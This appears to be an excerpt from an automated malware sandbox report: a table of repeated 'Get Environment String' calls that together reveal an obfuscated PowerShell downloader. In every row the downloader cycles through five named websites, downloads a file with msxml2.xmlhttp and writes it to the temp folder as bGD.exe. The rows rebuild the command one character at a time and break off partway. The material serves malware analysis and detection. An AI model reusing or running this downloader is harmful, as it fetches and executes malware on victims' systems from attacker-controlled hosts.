| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Ti |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia, |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0) |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$r |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$ra |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.s |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.se |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.sen |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send() |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send(); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();I |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($r |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($ra |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.S |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.St |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Sta |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Stat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Statu |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status - |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -e |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 2 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 20 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) { |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$E |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EH |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.o |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.op |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.ope |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open |
|
1 | |
